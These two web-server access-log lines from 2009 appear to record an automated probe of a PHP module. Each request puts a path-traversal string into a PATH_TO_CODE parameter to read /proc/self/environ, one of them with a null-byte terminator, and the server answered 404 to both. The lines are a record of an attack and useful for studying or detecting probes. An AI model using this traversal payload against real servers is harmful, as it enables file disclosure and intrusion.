200.234.200.157 - - [26/Nov/2009:06:22:10 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
200.234.200.157 - - [26/Nov/2009:06:22:11 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
